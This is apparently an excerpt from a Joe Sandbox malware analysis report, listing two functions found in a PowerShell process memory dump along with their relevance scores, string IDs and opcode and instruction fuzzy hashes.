                                                                          Function 00007FFD347A89F2 Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000015.00000002.3504916572.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_21_2_7ffd347a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: K_^$K_^$K_^$K_^$K_^
                                                                          • API String ID: 0-4077390204
                                                                          • Opcode ID: 382fab64b65f0a09133fe03b98b148b6451d9da980270a69d2d840db1badd0f8
                                                                          • Instruction ID: b6f8295e4527318b66243f51eb752ce9e6af260c183ac990e6f1691f4bd4bbd9
                                                                          • Opcode Fuzzy Hash: 382fab64b65f0a09133fe03b98b148b6451d9da980270a69d2d840db1badd0f8
                                                                          • Instruction Fuzzy Hash: B131B6E3A0E9C26BE7A646185CE61D67BE4EF53318B0A01F6C284DB193ED5D2C439181
                                                                          Function 00007FFD347A8BD3 Relevance: 7.6, Strings: 6, Instructions: 146COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000015.00000002.3504916572.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_21_2_7ffd347a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: K_^4$K_^5$K_^@$K_^N$K_^U$K_^Y
                                                                          • API String ID: 0-4293504607
                                                                          • Opcode ID: 157f60dbbf6883378342fbb3d5e2ea1095fb0bc91325ffccbe2615fcbb2eaca6
                                                                          • Instruction ID: bdcccfaeaf4385c50d94f986e4e3f2121d7b805554094f90d34955b7dd432b51
                                                                          • Opcode Fuzzy Hash: 157f60dbbf6883378342fbb3d5e2ea1095fb0bc91325ffccbe2615fcbb2eaca6
                                                                          • Instruction Fuzzy Hash: 523113B7B0892A6FD61176BCB8921ED7798DF9527934503B7D288DB143CC28708B86C0